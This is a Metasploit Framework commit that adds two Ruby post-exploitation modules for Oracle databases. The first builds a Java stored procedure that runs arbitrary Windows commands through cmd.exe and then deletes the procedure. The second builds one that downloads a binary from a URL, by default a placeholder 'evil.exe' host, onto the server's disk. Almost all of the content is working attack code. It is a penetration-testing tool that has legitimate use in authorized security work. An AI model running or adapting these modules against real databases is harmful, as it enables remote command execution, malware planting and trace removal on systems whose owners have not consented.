win32exec and win32upload modules for oracle post exploitation

git-svn-id: file:///home/svn/framework3/trunk@6920 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-29 04:18:08 +00:00 · 2009-07-29 04:18:08 +00:00 · df18371123
parent 24e1af3f74
commit df18371123
2 changed files with 186 additions and 0 deletions
--- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
+++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb
@ -0,0 +1,87 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::ORACLE
+	
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Execute win32 OS commands',
+			'Description'    => %q{
+					This module will create a java class which enables the execution of OS commands.
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision:$',
+			'References'     =>
+				[
+					[ 'URL', 'https://www.metasploit.com/users/mc' ],
+				],
+			'DisclosureDate' => 'Dec 7 2007'))
+
+			register_options( 
+				[
+					OptString.new('CMD', [ false, 'The OS command to execute.',  'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),
+				], self.class)
+	end
+
+	def run
+		# use oracle_sql if a java error occurs. "grant javasyspriv to <user>"
+
+		source = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+		name   = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+
+		java = "
+			create or replace and resolve java source named \"#{source}\" as
+			import java.lang.*;
+			import java.io.*;
+			public class #{source}
+			{
+			public static void execCommand (String command) throws IOException
+			{
+			Runtime.getRuntime().exec(command);
+			}
+			};
+			"
+
+		procedure = "
+			create or replace procedure #{name} (p_command in varchar2) 
+			as language java
+			name '#{source}.execCommand (java.lang.String)';
+			"
+
+		exec      = "begin #{name}('cmd.exe /c #{datastore['CMD']}'); end;"
+
+		drops     = "drop java source #{source}"
+
+		dropp     = "drop procedure #{name}" 
+
+		begin
+			print_status("Creating java source '#{source}'...")
+			prepare_exec(java)
+		rescue => e
+			return
+		end
+
+		print_status("Creating procedure '#{name}'...")
+		prepare_exec(procedure)
+
+		print_status("Sending command: '#{datastore['CMD']}'")
+		prepare_exec(exec)
+
+		print_status("Removing java source '#{source}'...")
+		prepare_exec(drops)
+
+		print_status("Removing procedure '#{name}'...")
+		prepare_exec(dropp)
+
+	end
+
+end
--- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
+++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
@ -0,0 +1,99 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::ORACLE
+	
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Execute win32 OS commands',
+			'Description'    => %q{
+					This module will create a java class which enables the download of a binary from a webserver to the oracle filesystem.
+			},
+			'Author'         => [ 'CG' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision:$',
+			'References'     =>
+				[
+					[ 'URL', 'http://www.argeniss.com/research/oraclesqlinj.zip' ],
+				],
+			'DisclosureDate' => 'Feb 2003'))
+
+			register_options( 
+				[
+					OptString.new('URL', [ false, 'The URL to download the binary from.',  'http://www.meh.com/evil.exe']),
+					OptString.new('COPYTO', [ false, 'Location to copy the binary to',  'c:\\meh.exe']),
+				], self.class)
+	end
+
+	def run
+		# use oracle_sql if a java error occurs. "grant javasyspriv to <user>"
+
+		#source = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+		#name   = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+		#create or replace and resolve java source named \"#{source}\" as
+
+		java = "
+			CREATE OR REPLACE JAVA SOURCE NAMED SRC_FILE_UPLOAD AS
+			import java.lang.*;
+			import java.io.*;
+			public class FileUpload
+			{
+				public static void fileUpload(String myFile, String url) throws IOException
+			{
+			File binaryFile = new File(myFile);
+    			FileOutputStream outStream = new  FileOutputStream(binaryFile);
+    			java.net.URL u = new java.net.URL(url);
+			java.net.URLConnection uc = u.openConnection();
+			InputStream is = (InputStream)uc.getInputStream();
+			BufferedReader in = new BufferedReader (new InputStreamReader (is));
+			byte buffer[] = new byte[1024];
+			int length = -1;
+			while ((length = is.read(buffer)) != -1) {
+			outStream.write(buffer, 0, length);
+			outStream.flush(); }
+    			is.close(); outStream.close();
+  			} };;
+			"
+
+		procedure = "
+			CREATE OR REPLACE PROCEDURE PROC_FILEUPLOAD (p_file varchar2, p_url varchar2)
+			as language java
+			NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)';
+			"
+
+		exec      = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"	
+		
+		drops     = "drop java source SRC_FILE_UPLOAD"
+
+		dropp     = "drop procedure PROC_FILEUPLOAD" 
+
+		begin
+			print_status("Creating java source 'SRC_FILE_UPLOAD'...")
+			prepare_exec(java)
+		rescue => e
+			return
+		end
+
+		print_status("Creating procedure 'PROC_FILEUPLOAD'...")
+		prepare_exec(procedure)
+
+		print_status("Trying to download binary from #{datastore['URL']} to #{datastore['COPYTO']}")
+		prepare_exec(exec)
+
+		print_status("Removing java source 'SRC_FILE_UPLOAD'...")
+		prepare_exec(drops)
+
+		print_status("Removing procedure 'PROC_FILEUPLOAD'...")
+		prepare_exec(dropp)
+
+	end
+
+end